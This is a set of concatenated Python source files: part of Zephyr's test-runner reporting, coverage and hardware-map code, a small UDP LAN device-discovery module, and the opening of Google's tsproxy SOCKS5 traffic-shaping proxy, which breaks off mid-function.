handler_time = instance.metrics.get('handler_time', 0)
if full_report:
for k in instance.results.keys():
eleTestcase = ET.SubElement(
eleTestsuite, 'testcase',
classname="%s:%s" % (instance.platform.name, tname),
name="%s" % (k), time="%f" % handler_time)
if instance.results[k] in ['FAIL', 'BLOCK']:
if instance.results[k] == 'FAIL':
el = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message="failed")
else:
el = ET.SubElement(
eleTestcase,
'error',
type="failure",
message="failed")
p = os.path.join(self.outdir, instance.platform.name, instance.testcase.name)
log_file = os.path.join(p, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'SKIP':
el = ET.SubElement(
eleTestcase,
'skipped',
type="skipped",
message=instance.reason)
else:
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname="%s:%s" % (instance.platform.name, instance.testcase.name),
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["failed", "timeout"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
p = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(p, "build.log")
hl = os.path.join(p, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
            t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
return t
@staticmethod
    def retrieve_gcov_data(input_file):
        logger.debug("Working on %s" % input_file)
        extracted_coverage_info = {}
        capture_data = False
        capture_complete = False
        with open(input_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
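    # Expected handler.log layout parsed by retrieve_gcov_data() (illustrative;
    # the file name and hex payload are hypothetical):
    #
    #   GCOV_COVERAGE_DUMP_START
    #   *path/to/file.gcda<0a0b0c...
    #   GCOV_COVERAGE_DUMP_END
    #
    # Each "*"-prefixed line is split on '<' into a gcda file name and its hex
    # dump, which create_gcda_files() later writes back out as binary.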
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
# if kobject_hash is given for coverage gcovr fails
# hence skipping it problem only in gcovr v4.1
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append(pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile], stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes +
["--json", "-o", coveragefile, outdir],
stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
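# Illustrative sketch (not part of the original script): one plausible way to
# drive the coverage classes above. The tool name, gcov binary and output
# directory below are hypothetical examples.
def _example_generate_coverage(outdir="sanity-out"):
    coverage_tool = CoverageTool.factory("lcov")
    if coverage_tool:
        coverage_tool.gcov_tool = "gcov"
        coverage_tool.base_dir = ZEPHYR_BASE
        coverage_tool.add_ignore_file("generated")
        coverage_tool.add_ignore_directory("tests")
        coverage_tool.generate(outdir)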
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "sanity_chk", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.connected_hardware = []
def load_device_from_cmdline(self, serial, platform):
device = {
"serial": serial,
"platform": platform,
"counter": 0,
"available": True,
"connected": True
}
self.connected_hardware.append(device)
def load_hardware_map(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
self.connected_hardware = scl.yaml_load_verify(map_file, hwm_schema)
for i in self.connected_hardware:
i['counter'] = 0
def scan_hw(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = {}
s_dev['platform'] = "unknown"
s_dev['id'] = d.serial_number
s_dev['serial'] = persistent_map.get(d.device, d.device)
s_dev['product'] = d.product
s_dev['runner'] = 'unknown'
for runner, _ in self.runner_mapping.items():
products = self.runner_mapping.get(runner)
if d.product in products:
s_dev['runner'] = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev['runner'] = runner
s_dev['available'] = True
s_dev['connected'] = True
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def write_map(self, hwm_file):
# use existing map
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=yaml.FullLoader)
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for d in self.detected:
for h in hwm:
if d['id'] == h['id'] and d['product'] == h['product']:
h['connected'] = True
h['serial'] = d['serial']
d['match'] = True
new = list(filter(lambda n: not n.get('match', False), self.detected))
hwm = hwm + new
logger.info("Registered devices:")
self.dump(hwm)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, default_flow_style=False)
else:
# create new file
with open(hwm_file, 'w') as yaml_file:
yaml.dump(self.detected, yaml_file, default_flow_style=False)
logger.info("Detected devices:")
self.dump(self.detected)
@staticmethod
def dump(hwmap=[], filtered=[], header=[], connected_only=False):
print("")
table = []
if not header:
header = ["Platform", "ID", "Serial device"]
for p in sorted(hwmap, key=lambda i: i['platform']):
platform = p.get('platform')
connected = p.get('connected', False)
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.get('id', None), p.get('serial')])
print(tabulate(table, headers=header, tablefmt="github"))
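# Illustrative sketch (not part of the original script): scanning for connected
# boards and writing/printing the resulting map. The map file name is a
# hypothetical example.
def _example_scan_hardware(hwm_file="hardware-map.yaml"):
    hwmap = HardwareMap()
    hwmap.scan_hw()
    hwmap.write_map(hwm_file)
    HardwareMap.dump(hwmap.detected, connected_only=True)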
def size_report(sc):
logger.info(sc.filename)
logger.info("SECTION NAME VMA LMA SIZE HEX SZ TYPE")
for i in range(len(sc.sections)):
v = sc.sections[i]
logger.info("%-17s 0x%08x 0x%08x %8d 0x%05x %-7s" %
(v["name"], v["virt_addr"], v["load_addr"], v["size"], v["size"],
v["type"]))
logger.info("Totals: %d bytes (ROM), %d bytes (RAM)" %
(sc.rom_size, sc.ram_size))
logger.info("")
def export_tests(filename, tests):
with open(filename, "wt") as csvfile:
fieldnames = ['section', 'subsection', 'title', 'reference']
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
for test in tests:
data = test.split(".")
if len(data) > 1:
subsec = " ".join(data[1].split("_")).title()
rowdict = {
"section": data[0].capitalize(),
"subsection": subsec,
"title": test,
"reference": test
}
cw.writerow(rowdict)
else:
logger.info("{} can't be exported".format(test))
|
fast.py
|
import netifaces
import socket
import time
import threading
from essentials import socket_ops_v2 as socket_ops
from essentials.network_ops import Get_GW, Get_IP
class Device(object):
def __init__(self, ip, data):
self.ip = ip
self.discovery_data = data
@property
def json(self):
data = {"ip": self.ip, "discovery_data": self.discovery_data}
return data
class Devices(object):
def __init__(self):
self.All = {}
@property
def json(self):
data = {}
for item in self.All:
data[self.All[item].ip] = self.All[item].json
return data
class Discovery_Server(object):
def __init__(self, HOST=None, PORT=None, hotphrase="discovery", discovery_data="Server"):
self.HOST = HOST
self.PORT = PORT
self.hotphrase = hotphrase
self.discovery_data = discovery_data
self.responder_function = self.__discovery_response__
self.running = False
def run(self, HOST=None, PORT=None):
if self.running != False:
return
if HOST is not None:
self.HOST = HOST
if PORT is not None:
self.PORT = PORT
def __ignore__(_):
pass
self.server = socket_ops.UDP_Server(self.HOST, self.PORT, __ignore__, self.responder_function, max_buffer=len(self.hotphrase))
self.running = True
def shutdown(self):
self.server.shutdown()
self.running = False
def __discovery_response__(self, data, connector=socket_ops.UDP_Server_Client):
data = data.decode()
if data == self.hotphrase:
connector.send(self.discovery_data.encode())
class Discovery_Runner(object):
def __init__(self, port, runners=5, hotphrase="discovery"):
self.GW = Get_GW()
self.IP = Get_IP()
self.hotphrase = hotphrase
self.runners = runners
self.timeout = 5
self.check_port = port
self.base = ".".join(self.GW.split(".")[:3]) + "."
self.running = 0
self.Devices = Devices()
def Collect(self, timeout=5, runners=None, hotphrase=None):
if runners is not None:
self.runners = runners
if hotphrase is not None:
self.hotphrase = hotphrase
self.Devices = Devices()
self.counted = 0
self.timeout = timeout
self.responses = 0
runners = self.runners
start = 1
end = 0
for i in range(1, runners + 1):
end = 255//runners*i
if i == runners:
end = 255
threading.Thread(target=self.__runner__, args=[start, end, self.check_port], daemon=True).start()
self.running += 1
start += (255//runners)
while self.running > 0:
print("[ DDS ] - Device Discovery Scan. Addresses Contacted:", self.counted, end="\r")
time.sleep(0.01)
print("[ DDS ] - Device Discovery Scan. Addresses Contacted:", self.counted)
to = 0
while to < timeout:
print("[ DDS ] - Device Discovery Scan. Responses:", self.responses, end="\r")
to += 0.01
time.sleep(0.01)
print("[ DDS ] - Device Discovery Scan. Responses:", self.responses)
return self.Devices
def __runner_data__(self, data, address):
self.responses += 1
self.Devices.All[address[0]] = Device(address[0], data.decode())
def __runner__(self, start, end, port):
while start <= end:
try:
if start == 255:
break
rmIP = self.base + str(start)
self.counted += 1
try:
connector = socket_ops.UDP_Connector(rmIP, self.check_port, self.__runner_data__, 5)
connector.send(self.hotphrase.encode())
except Exception as e:
print(e)
pass
except KeyboardInterrupt:
print("[ UKI ] - User Keyboard Interupt")
exit()
except TimeoutError:
pass
except Exception as e:
#print(e)
pass
start += 1
self.running -= 1
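# Illustrative usage sketch (not part of the original module). The port and
# discovery_data values below are hypothetical; Collect() blocks until the scan
# and the response timeout finish.
def _example_discovery(port=37020):
    server = Discovery_Server(HOST="0.0.0.0", PORT=port, discovery_data="my-device")
    server.run()
    devices = Discovery_Runner(port).Collect(timeout=5)
    server.shutdown()
    return devices.json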
|
tsproxy.py
|
#!/usr/bin/env python
"""
Copyright 2016 Google Inc. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import asyncore
import gc
import logging
import platform
try:
from Queue import Queue
from Queue import Empty
except ImportError:
from queue import Queue
from queue import Empty
import re
import signal
import socket
import sys
import threading
import time
server = None
in_pipe = None
out_pipe = None
must_exit = False
options = None
dest_addresses = None
connections = {}
dns_cache = {}
port_mappings = None
map_localhost = False
needs_flush = False
flush_pipes = False
last_activity = None
last_client_disconnected = None
REMOVE_TCP_OVERHEAD = 1460.0 / 1500.0
lock = threading.Lock()
background_activity_count = 0
if (sys.version_info >= (3,0)):
from time import monotonic
else:
from monotonic import monotonic
current_time = monotonic
def PrintMessage(msg):
# Print the message to stdout & flush to make sure that the message is not
# buffered when tsproxy is run as a subprocess.
sys.stdout.write(msg + '\n')
sys.stdout.flush()
########################################################################################################################
# Traffic-shaping pipe (just passthrough for now)
########################################################################################################################
class TSPipe():
PIPE_IN = 0
PIPE_OUT = 1
def __init__(self, direction, latency, kbps):
self.direction = direction
self.latency = latency
self.kbps = kbps
self.queue = Queue()
self.last_tick = current_time()
self.next_message = None
self.available_bytes = .0
self.peer = 'server'
if self.direction == self.PIPE_IN:
self.peer = 'client'
def SendMessage(self, message, main_thread = True):
global connections, in_pipe, out_pipe
message_sent = False
now = current_time()
if message['message'] == 'closed':
message['time'] = now
else:
message['time'] = current_time() + self.latency
message['size'] = .0
if 'data' in message:
message['size'] = float(len(message['data']))
try:
connection_id = message['connection']
      # Send messages directly, bypassing the queues, if throttling is disabled and we are on the main thread
      if main_thread and connection_id in connections and self.peer in connections[connection_id] and self.latency == 0 and self.kbps == .0:
message_sent = self.SendPeerMessage(message)
except:
pass
if not message_sent:
try:
self.queue.put(message)
except:
pass
def SendPeerMessage(self, message):
global last_activity, last_client_disconnected
last_activity = current_time()
message_sent = False
connection_id = message['connection']
if connection_id in connections:
if self.peer in connections[connection_id]:
try:
connections[connection_id][self.peer].handle_message(message)
message_sent = True
except:
# Clean up any disconnected connections
try:
connections[connection_id]['server'].close()
except:
pass
try:
connections[connection_id]['client'].close()
except:
pass
del connections[connection_id]
if not connections:
last_client_disconnected = current_time()
            logging.info('[{0:d}] Last connection closed'.format(connection_id))
return message_sent
def tick(self):
global connections
global flush_pipes
next_packet_time = None
processed_messages = False
now = current_time()
try:
if self.next_message is None:
self.next_message = self.queue.get_nowait()
# Accumulate bandwidth if an available packet/message was waiting since our last tick
if self.next_message is not None and self.kbps > .0 and self.next_message['time'] <= now:
elapsed = now - self.last_tick
accumulated_bytes = elapsed * self.kbps * 1000.0 / 8.0
self.available_bytes += accumulated_bytes
# process messages as long as the next message is sendable (latency or available bytes)
while (self.next_message is not None) and\
(flush_pipes or ((self.next_message['time'] <= now) and
(self.kbps <= .0 or self.next_message['size'] <= self.available_bytes))):
processed_messages = True
message = self.next_message
self.next_message = None
if self.kbps > .0:
self.available_bytes -= message['size']
try:
self.SendPeerMessage(message)
except:
pass
self.next_message = self.queue.get_nowait()
except Empty:
pass
except Exception as e:
logging.exception('Tick Exception')
# Only accumulate bytes while we have messages that are ready to send
if self.next_message is None or self.next_message['time'] > now:
self.available_bytes = .0
self.last_tick = now
# Figure out how long until the next packet can be sent
if self.next_message is not None:
# First, just the latency
next_packet_time = self.next_message['time'] - now
# Additional time for bandwidth
if self.kbps > .0:
accumulated_bytes = self.available_bytes + next_packet_time * self.kbps * 1000.0 / 8.0
needed_bytes = self.next_message['size'] - accumulated_bytes
if needed_bytes > 0:
needed_time = needed_bytes / (self.kbps * 1000.0 / 8.0)
next_packet_time += needed_time
return next_packet_time
########################################################################################################################
# Threaded DNS resolver
########################################################################################################################
class AsyncDNS(threading.Thread):
def __init__(self, client_id, hostname, port, is_localhost, result_pipe):
threading.Thread.__init__(self)
self.hostname = hostname
self.port = port
self.client_id = client_id
self.is_localhost = is_localhost
self.result_pipe = result_pipe
def run(self):
global lock, background_activity_count
try:
logging.debug('[{0:d}] AsyncDNS - calling getaddrinfo for {1}:{2:d}'.format(self.client_id, self.hostname, self.port))
addresses = socket.getaddrinfo(self.hostname, self.port)
logging.info('[{0:d}] Resolving {1}:{2:d} Completed'.format(self.client_id, self.hostname, self.port))
except:
addresses = ()
logging.info('[{0:d}] Resolving {1}:{2:d} Failed'.format(self.client_id, self.hostname, self.port))
message = {'message': 'resolved', 'connection': self.client_id, 'addresses': addresses, 'localhost': self.is_localhost}
self.result_pipe.SendMessage(message, False)
lock.acquire()
if background_activity_count > 0:
background_activity_count -= 1
lock.release()
# open and close a local socket which will interrupt the long polling loop to process the message
s = socket.socket()
s.connect((server.ipaddr, server.port))
s.close()
########################################################################################################################
# TCP Client
########################################################################################################################
class TCPConnection(asyncore.dispatcher):
STATE_ERROR = -1
STATE_IDLE = 0
STATE_RESOLVING = 1
STATE_CONNECTING = 2
STATE_CONNECTED = 3
def __init__(self, client_id):
global options
asyncore.dispatcher.__init__(self)
self.client_id = client_id
self.state = self.STATE_IDLE
self.buffer = ''
self.addr = None
self.dns_thread = None
self.hostname = None
self.port = None
self.needs_config = True
self.needs_close = False
self.did_resolve = False
def SendMessage(self, type, message):
message['message'] = type
message['connection'] = self.client_id
in_pipe.SendMessage(message)
def handle_message(self, message):
if message['message'] == 'data' and 'data' in message and len(message['data']):
self.buffer += message['data']
if self.state == self.STATE_CONNECTED:
self.handle_write()
elif message['message'] == 'resolve':
self.HandleResolve(message)
elif message['message'] == 'connect':
self.HandleConnect(message)
elif message['message'] == 'closed':
if len(self.buffer) == 0:
self.handle_close()
else:
self.needs_close = True
def handle_error(self):
logging.warning('[{0:d}] Error'.format(self.client_id))
if self.state == self.STATE_CONNECTING:
self.SendMessage('connected', {'success': False, 'address': self.addr})
def handle_close(self):
global last_client_disconnected
logging.info('[{0:d}] Server Connection Closed'.format(self.client_id))
self.state = self.STATE_ERROR
self.close()
try:
if self.client_id in connections:
if 'server' in connections[self.client_id]:
del connections[self.client_id]['server']
if 'client' in connections[self.client_id]:
self.SendMessage('closed', {})
else:
del connections[self.client_id]
if not connections:
last_client_disconnected = current_time()
logging.info('[{0:d}] Last Browser disconnected'.format(self.client_id))
except:
pass
def handle_connect(self):
if self.state == self.STATE_CONNECTING:
self.state = self.STATE_CONNECTED
self.SendMessage('connected', {'success': True, 'address': self.addr})
logging.info('[{0:d}] Connected'.format(self.client_id))
self.handle_write()
def writable(self):
if self.state == self.STATE_CONNECTING:
return True
return len(self.buffer) > 0
def handle_write(self):
if self.needs_config:
self.needs_config = False
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 128 * 1024)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 128 * 1024)
if len(self.buffer) > 0:
sent = self.send(self.buffer)
logging.debug('[{0:d}] TCP => {1:d} byte(s)'.format(self.client_id, sent))
self.buffer = self.buffer[sent:]
if self.needs_close and len(self.buffer) == 0:
self.needs_close = False
self.handle_close()
def handle_read(self):
try:
while True:
data = self.recv(1460)
if data:
if self.state == self.STATE_CONNECTED:
logging.debug('[{0:d}] TCP <= {1:d} byte(s)'.format(self.client_id, len(data)))
self.SendMessage('data', {'data': data})
else:
return
except:
pass
def HandleResolve(self, message):
global in_pipe, map_localhost, lock, background_activity_count
self.did_resolve = True
is_localhost = False
if 'hostname' in message:
self.hostname = message['hostname']
self.port = 0
if 'port' in message:
self.port = message['port']
logging.info('[{0:d}] Resolving {1}:{2:d}'.format(self.client_id, self.hostname, self.port))
if self.hostname == 'localhost':
self.hostname = '127.0.0.1'
if self.hostname == '127.0.0.1':
logging.info('[{0:d}] Connection to localhost detected'.format(self.client_id))
is_localhost = True
if (dest_addresses is not None) and (not is_localhost or map_localhost):
logging.info('[{0:d}] Resolving {1}:{2:d} to mapped address {3}'.format(self.client_id, self.hostname, self.port, dest_addresses))
self.SendMessage('resolved', {'addresses': dest_addresses, 'localhost': False})
else:
lock.acquire()
background_activity_count += 1
lock.release()
self.state = self.STATE_RESOLVING
self.dns_thread = AsyncDNS(self.client_id, self.hostname, self.port, is_localhost, in_pipe)
self.dns_thread.start()
def HandleConnect(self, message):
global map_localhost
if 'addresses' in message and len(message['addresses']):
self.state = self.STATE_CONNECTING
is_localhost = False
if 'localhost' in message:
is_localhost = message['localhost']
elif not self.did_resolve and message['addresses'][0] == '127.0.0.1':
logging.info('[{0:d}] Connection to localhost detected'.format(self.client_id))
is_localhost = True
if (dest_addresses is not None) and (not is_localhost or map_localhost):
self.addr = dest_addresses[0]
else:
self.addr = message['addresses'][0]
self.create_socket(self.addr[0], socket.SOCK_STREAM)
addr = self.addr[4][0]
if not is_localhost or map_localhost:
port = GetDestPort(message['port'])
else:
port = message['port']
logging.info('[{0:d}] Connecting to {1}:{2:d}'.format(self.client_id, addr, port))
self.connect((addr, port))
########################################################################################################################
# Socks5 Server
########################################################################################################################
class Socks5Server(asyncore.dispatcher):
def __init__(self, host, port):
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
try:
self.set_reuse_addr()
self.bind((host, port))
self.listen(socket.SOMAXCONN)
self.ipaddr, self.port = self.socket.getsockname()
self.current_client_id = 0
except:
PrintMessage("Unable to listen on {0}:{1}. Is the port already in use?".format(host, port))
exit(1)
def handle_accept(self):
global connections, last_client_disconnected
pair = self.accept()
if pair is not None:
last_client_disconnected = None
sock, addr = pair
self.current_client_id += 1
logging.info('[{0:d}] Incoming connection from {1}'.format(self.current_client_id, repr(addr)))
connections[self.current_client_id] = {
'client' : Socks5Connection(sock, self.current_client_id),
'server' : None
}
# Socks5 reference: https://en.wikipedia.org/wiki/SOCKS#SOCKS5
class Socks5Connection(asyncore.dispatcher):
STATE_ERROR = -1
STATE_WAITING_FOR_HANDSHAKE = 0
STATE_WAITING_FOR_CONNECT_REQUEST = 1
STATE_RESOLVING = 2
STATE_CONNECTING = 3
STATE_CONNECTED = 4
def __init__(self, connected_socket, client_id):
global options
asyncore.dispatcher.__init__(self, connected_socket)
self.client_id = client_id
self.state = self.STATE_WAITING_FOR_HANDSHAKE
self.ip = None
self.addresses = None
self.hostname = None
self.port = None
self.requested_address = None
self.buffer = ''
self.socket.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 128 * 1024)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, 128 * 1024)
self.needs_close = False
def SendMessage(self, type, message):
message['message'] = type
message['connection'] = self.client_id
out_pipe.SendMessage(message)
def handle_message(self, message):
if message['message'] == 'data' and 'data' in message and len(message['data']) > 0:
self.buffer += message['data']
if self.state == self.STATE_CONNECTED:
self.handle_write()
elif message['message'] == 'resolved':
self.HandleResolved(message)
elif message['message'] == 'connected':
self.HandleConnected(message)
self.handle_write()
elif message['message'] == 'closed':
if len(self.buffer) == 0:
logging.info('[{0:d}] Server connection close being processed, closing Browser connection'.format(self.client_id))
self.handle_close()
else:
logging.info('[{0:d}] Server connection close being processed, queuing browser connection close'.format(self.client_id))
self.needs_close = True
def writable(self):
return len(self.buffer) > 0
def handle_write(self):
if len(self.buffer) > 0:
sent = self.send(self.buffer)
logging.debug('[{0:d}] SOCKS <= {1:d} byte(s)'.format(self.client_id, sent))
self.buffer = self.buffer[sent:]
if self.needs_close and len(self.buffer) == 0:
logging.info('[{0:d}] queued browser connection close being processed, closing Browser connection'.format(self.client_id))
self.needs_close = False
self.handle_close()
def handle_read(self):
global connections
global dns_cache
try:
while True:
        # Consume in up-to packet-sized chunks (TCP packet payload is 1460 bytes from 1500-byte ethernet frames)
data = self.recv(1460)
if data:
data_len = len(data)
if self.state == self.STATE_CONNECTED:
logging.debug('[{0:d}] SOCKS => {1:d} byte(s)'.format(self.client_id, data_len))
self.SendMessage('data', {'data': data})
elif self.state == self.STATE_WAITING_FOR_HANDSHAKE:
self.state = self.STATE_ERROR #default to an error state, set correctly if things work out
if data_len >= 2 and ord(data[0]) == 0x05:
supports_no_auth = False
auth_count = ord(data[1])
if data_len == auth_count + 2:
for i in range(auth_count):
offset = i + 2
if ord(data[offset]) == 0:
supports_no_auth = True
if supports_no_auth:
# Respond with a message that "No Authentication" was agreed to
logging.info('[{0:d}] New Socks5 client'.format(self.client_id))
response = chr(0x05) + chr(0x00)
self.state = self.STATE_WAITING_FOR_CONNECT_REQUEST
self.buffer += response
self.handle_write()
elif self.state == self.STATE_WAITING_FOR_CONNECT_REQUEST:
self.state = self.STATE_ERROR #default to an error state, set correctly if things work out
if data_len >= 10 and ord(data[0]) == 0x05 and ord(data[2]) == 0x00:
if ord(data[1]) == 0x01: #TCP connection (only supported method for now)
connections[self.client_id]['server'] = TCPConnection(self.client_id)
self.requested_address = data[3:]
port_offset = 0
if ord(data[3]) == 0x01:
port_offset = 8
self.ip = '{0:d}.{1:d}.{2:d}.{3:d}'.format(ord(data[4]), ord(data[5]), ord(data[6]), ord(data[7]))
elif ord(data[3]) == 0x03:
name_len = ord(data[4])
if data_len >= 6 + name_len:
port_offset = 5 + name_len
self.hostname = data[5:5 + name_len]
elif ord(data[3]) == 0x04 and data_len >= 22:
port_offset = 20
self.ip = ''
for i in range(16):
self.ip += '{0:02x}'.format(ord(data[4 + i]))
if i % 2 and i < 15:
